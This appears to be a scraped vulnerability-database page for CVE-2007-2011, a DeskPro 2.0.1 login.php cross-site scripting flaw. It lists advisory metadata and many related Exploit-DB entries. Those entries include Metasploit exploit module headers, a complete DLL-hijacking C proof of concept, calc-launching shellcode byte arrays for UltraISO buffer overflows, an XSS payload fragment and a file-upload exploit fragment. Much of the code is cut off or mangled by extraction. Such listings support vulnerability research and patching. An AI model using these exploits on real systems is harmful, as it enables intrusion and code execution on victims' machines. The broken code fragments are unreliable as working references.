CVE-2007-2011
Published 2007-04-12. CVE-2007-2011: Cross-site scripting (XSS) vulnerability in login.php in DeskPro 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
Priority: P418 · medium · 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EPSS: 1.87% (76.7th percentile)
Cross-site scripting (XSS) vulnerability in login.php in DeskPro 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deskpro | deskpro | — | — |
CVSS provenance
nvd · v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat · 7.8 HIGH
GHSA
GHSA-72wq-j3f9-x5wf: Cross-site scripting (XSS) vulnerability in login
ghsa_unreviewed·2022-05-01
CVE-2007-2011 [MEDIUM] GHSA-72wq-j3f9-x5wf: Cross-site scripting (XSS) vulnerability in login
Cross-site scripting (XSS) vulnerability in login.php in DeskPro 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
httpd: multiple ranges DoS
vendor_redhat·2011-08-20·CVSS 7.8
CVE-2011-3192 [HIGH] httpd: multiple ranges DoS
httpd: multiple ranges DoS
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
Statement: Before updated packages are deployed, users can deploy configuration changes to mitigate this flaw:
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3192#c18
Package: httpd (Red Hat Directory Server 8) - Affected
Red Hat
php-pear: symlink vulnerability in PEAR installer
vendor_redhat·2010-11-14·CVSS 6.8
CVE-2011-1072 [MEDIUM] php-pear: symlink vulnerability in PEAR installer
php-pear: symlink vulnerability in PEAR installer
The installer in PEAR before 1.9.2 allows local users to overwrite arbitrary files via a symlink attack on the package.xml file, related to the (1) download_dir, (2) cache_dir, (3) tmp_dir, and (4) pear-build-download directories, a different vulnerability than CVE-2007-2519.
Package: php-pear (Red Hat Enterprise Linux 5) - Not affected
Red Hat
glibc: fnmatch() alloca()-based memory corruption flaw
vendor_redhat·2010-08-05·CVSS 5.0
CVE-2011-1071 [MEDIUM] glibc: fnmatch() alloca()-based memory corruption flaw
glibc: fnmatch() alloca()-based memory corruption flaw
The GNU C Library (aka glibc or libc6) before 2.12.2 and Embedded GLIBC (EGLIBC) allow context-dependent attackers to execute arbitrary code or cause a denial of service (memory consumption) via a long UTF8 string that is used in an fnmatch call, aka a "stack extension attack," a related issue to CVE-2010-2898, CVE-2010-1917, and CVE-2007-4782, as originally reported for use of this library by Google Chrome.
Red Hat
sysstat insecure temporary file usage
vendor_redhat·2007-08-10·CVSS 4.4
CVE-2007-3852 [MEDIUM] CWE-377 sysstat insecure temporary file usage
sysstat insecure temporary file usage
The init script (sysstat.in) in sysstat 5.1.2 up to 7.1.6 creates /tmp/sysstat.run insecurely, which allows local users to execute arbitrary code.
Statement: This issue did not affect the versions of sysstat as shipped with Red Hat Enterprise Linux 4. This issue has been addressed in Red Hat Enterprise Linux 5 via RHSA-2011:1005 advisory.
No detection rules found.
Exploit-DB
Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure
exploitdb·2011-11-07·CVSS 6.0
CVE-2007-4517 [MEDIUM] Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure
Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure
---
# Exploit Title: New exploit to Oracle CVE-2007-4517 vulnerability
# Date: 11,2,2011
# Author: David Maman and the GreenSQL Team
# Software Link: http://blog.greensql.com/2011/11/02/new-exploit-to-oracle-vulnerability/
# Version: 0.1
# Tested on: Oracle Database 10g Express Edition
# CVE : New exploit to CVE-2007-4517
Summary
As part of GreenSQL's database security research, we've been validating and extending coverage of known and unknown vulnerabilities in order to increase GreenSQL product security. In this post we will reveal a full working Proof of Concept for the CVE-2007-4517 vulnerability which executes arbitrary code.
The Exploit: PL/SQL/2007-4517 exploit is a PL/SQL procedure that exploits the CVE-2007-4517 vulnerab
Exploit-DB
Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)
exploitdb·2011-11-05
CVE-2011-0105 Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)
Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)
---
##
# $Id: ms11_021_xlb_bof.rb 14172 2011-11-06 20:16:34Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Excel of Microsoft Office 2007.
By supplying a malformed .xlb file, an attacker can control the content (source)
of a memcpy routine, and the number of bytes to copy, therefore causing a stack-
based buffer overflow. This res
Exploit-DB
SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)
exploitdb·2011-09-20·CVSS 4.0
CVE-2011-1892 [MEDIUM] SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)
SharePoint 2007/2010 and DotNetNuke
]>
&boom;
poc filename: xee.xsl
Exploit-DB
DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)
exploitdb·2011-09-01
CVE-2007-3068 DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)
DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)
---
##
# $Id: dvdx_plf_bof.rb 13673 2011-09-01 05:20:47Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "DVD X Player 5.5 .plf PlayList Buffer Overflow",
'Description' => %q{
This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
Standard. By supplying a long string of data in a plf file (playlist), the
MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
and then copy it on the stack without any proper bounds chec
Exploit-DB
Oracle HTTP Server - Cross-Site Scripting Header Injection
exploitdb·2011-06-13·CVSS 4.3
CVE-2006-3918 [MEDIUM] Oracle HTTP Server - Cross-Site Scripting Header Injection
Oracle HTTP Server - Cross-Site Scripting Header Injection
---
Oracle HTTP Server XSS Header Injection
# Attack Pattern ID : CAPEC-86
# CWE ID : CI-79
# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS)
# CVE ID : not yet
# Related CVEs : CVE-2006-3918, CVE-2007-0275
# A.K.A : Unfiltered Header Injection
# Product Type : Application
# Vendor : Oracle Corporation
# Product : Oracle HTTP Server for Oracle Application Server 10g
# Vulnerable Versions: 10.1.2.0.2
# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0
# Severity : Medium
# Tested on : Linux, Windows Server 2003
# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html
# Date : 12/06/2011
# Google Dork : allintitle:"Oracle HTTP Server -"
[-] Cre
Exploit-DB
Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
exploitdb·2011-04-11
CVE-2011-2007 Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/49997/info
Microsoft Host Integration Server is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36211.zip
Exploit-DB
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
exploitdb·2011-03-04
CVE-2010-3333 Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
---
##
# $Id: ms10_087_rtf_pfragments_bof.rb 11875 2011-03-04 08:39:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087
Exploit-DB
Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)
exploitdb·2011-01-08
CVE-2007-2386 Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)
Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)
---
##
# $Id: upnp_location.rb 11515 2011-01-08 01:12:15Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mac OS X mDNSResponder UPnP Location Overflow',
'Description' => %q{
This module exploits a buffer overflow that occurs when processing
specially crafted requests set to mDNSResponder. All Mac OS X systems
between version 10.4 and 10.4.9 (without the 2007-005 patch) are
affected.
},
'License' => MSF_LICENSE,
'Author' =>
[
'ddz'
],
'Version' => '$Revision: 11515 $'
Exploit-DB
Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking
exploitdb·2010-08-25
CVE-2011-0108 Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking
Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking
---
/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles , Dinesh Arora, Anirban ,Ganesha, Dinesh Arora
# Site : www.beenuarora.com
Exploit Title: Microsoft Office Groove 2007 DLL Hijacking
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , Microsoft Office Groove 2007
Vulnerable extensions: wab , p7c
Compile and rename to mso.dll.dll, create a file in the same dir with one of the following extensions:
.vcg , .gta
*/
#include <windows.h>  /* WinExec; header name restored (eaten by HTML extraction) */
#include <stdlib.h>   /* exit */
#define DLLIMPORT __declspec (dllexport)
int evil(void);       /* forward declaration so hook_startup() can call it */
DLLIMPORT void hook_startup() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14746.zip
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)
exploitdb·2007-05-28
CVE-2007-2888 UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)
---
/*
Date : May 28th 2007.
UltraISO executes calc. Don't forget you need to have the bin and cue file in the same
directory. Special thanks to Thomas Pollet also.
*/
#include
#include
//Calc shell_code
unsigned char shell_code[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)
exploitdb·2007-05-28
CVE-2007-2888 UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)
---
#
#ultra iso exploit
#thomas . pollet @ gmail . com
#
import struct
scode=(#metasploit calc.exe shellcode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)
exploitdb·2007-05-24
CVE-2007-2888 UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)
---
#!/usr/bin/perl
############################################################
#Credit:To n00b for finding this bug and writing poc.
############################################################
#Ultra ISO stack over flow poc code.
#Ultra iso is exploitable via opening
#a specially crafted Cue file..There is
#A limitation that the user must have the bin
#file in the same dir as the cue file.
#This is the reason i have provided the
#Bin file also Command execution is possible
#As we can control $ebp and $eip hoooooha.
#I will be working on the local exploit
#as soon as i get a chance this should be a straight forward
#to exploit this as we already gain control of the
#$eip register..
#Tested on :win xp service pack 2
#Vendor'
Exploit-DB
DeskPro 2.0.1 - 'login.php' HTML Injection
exploitdb·2007-04-09
CVE-2007-2011 DeskPro 2.0.1 - 'login.php' HTML Injection
DeskPro 2.0.1 - 'login.php' HTML Injection
---
source: https://www.securityfocus.com/bid/23381/info
DeskPRO is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
DeskPRO 2.0.1 is vulnerable to this issue.
DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability, discovered by John Martinelli
alert(1);">
Exploit-DB
W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities
exploitdb·2007-03-20
CVE-2007-1604 W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities
W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities
---
source: https://www.securityfocus.com/bid/23055/info
w-Agora is prone to multiple arbitrary file-upload vulnerabilities.
An attacker can exploit these vulnerabilities to upload PHP script code and execute it in the context of the webserver process.
w-Agora 4.2.1 is vulnerable.
-----------------------------76401208715012
Content-Disposition: form-data; name="submit"
Copy file
-----------------------------76401208715012--
]
Response Headers:
Date[Mon, 30 May 2011 00:58:18 GMT]
Server[Apache/2.2.11 (Win32) PHP/5.3.0]
X-Powered-By[PHP/5.3.0]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
*/
if(count($argv) == 5)
{
echo "\n\n";
echo "+--------------------------
No writeups or analysis indexed.
http://john-martinelli.com/work/deskpro.txt
http://osvdb.org/34721
http://secunia.com/advisories/24844
http://securityreason.com/securityalert/2556
http://www.securityfocus.com/archive/1/465089/100/0/threaded
http://www.securityfocus.com/bid/23381
http://www.vupen.com/english/advisories/2007/1320
Published 2007-04-12